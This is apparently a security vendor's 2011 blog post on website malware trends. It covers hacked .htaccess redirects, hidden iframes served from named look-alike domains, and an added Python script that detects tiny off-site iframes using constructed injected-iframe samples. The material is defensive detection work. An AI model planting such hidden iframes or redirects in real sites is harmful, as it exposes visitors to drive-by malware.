Malware updates: Aug 2011 – .htaccess to .ru and osa.pl, iframes to .cc and .il

We are often asked which domains distribute the most malware and which threats we see most often on our security scanner.

For the month of August, things were very similar to previous months, with a slight increase in the number of WordPress sites compromised due to the Timthumb.php vulnerability.
If your site is currently compromised with malware or spam and you need help, sign up with us here: http://sucuri.net/signup. We will clean your site and get it off Google's blacklist.

.htaccess redirections

We are seeing many sites with a hacked .htaccess file. The modified file redirects the site's visitors to some Russian and Polish domains:

Malicious iframes

We are seeing many malicious iframes, especially from free domains (.cu.cc, .co.cc, etc.), and also from domains pretending to belong to Google or WordPress, such as toolbarqueries-google.info, counter-google.com and counter-wordpress.com:
Examples of iframes:

 
And many more; these are just some samples. If you think your site might be compromised, scan it with our scanner: http://sitecheck.sucuri.net
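One way to check your own pages for the injected iframes described in this section, as an added example that is not Sucuri's scanner or code from the original post. It assumes an injected frame is sized to be invisible (3 pixels or less on each side) and loads from a host other than your own; the host names and the sample page are constructed.

```python
import re
from urllib.parse import urlparse

MAX_PIXELS = 3  # assumption: a frame this small is meant to be invisible
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.I)
# name=value with double-quoted, single-quoted or unquoted values
ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")


def _attrs(tag_body):
    """Parse the attribute text of one tag into a lowercase-keyed dict."""
    return {m.group(1).lower(): m.group(2) or m.group(3) or m.group(4) or ""
            for m in ATTR.finditer(tag_body)}


def _tiny(value):
    """True when a width/height value is a pixel count <= MAX_PIXELS."""
    m = re.fullmatch(r"(\d+)(?:px)?", (value or "").strip(), re.I)
    return bool(m) and int(m.group(1)) <= MAX_PIXELS


def find_hidden_iframes(html, site_host):
    """Return (line, src) for each tiny iframe that loads from another host."""
    site_host = site_host.lower()
    findings = []
    for m in IFRAME_TAG.finditer(html):
        attr = _attrs(m.group(1))
        src = attr.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        # Relative URLs and the site's own subdomains are not off-site.
        off_site = bool(host) and host != site_host \
            and not host.endswith("." + site_host)
        if off_site and _tiny(attr.get("width")) and _tiny(attr.get("height")):
            findings.append((html.count("\n", 0, m.start()) + 1, src))
    return findings


# Constructed page: three injected frames, one normal embed, one same-site frame.
SAMPLE = """<html><body>
<p>Welcome</p>
<iframe src="http://injected.example.net/i.php?go=1" width="1" height="1"></iframe>
<iframe src='http://other.example.org/showthread.php?t=1' width='1' height='1' frameborder='0' >
<iframe frameborder=0 height=1 width=1 scrolling=no src="http://third.example.net/">
<iframe src="http://video.example.org/embed/42" width="560" height="315"></iframe>
<iframe src="/widgets/poll.html" width="1" height="1"></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, src in find_hidden_iframes(SAMPLE, "blog.example.com"):
        print(f"line {line}: hidden off-site iframe -> {src}")
```

The check works on raw file contents, so it can be run over templates and theme files on disk as well as over rendered pages; unclosed tags and unquoted attributes are handled.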
 
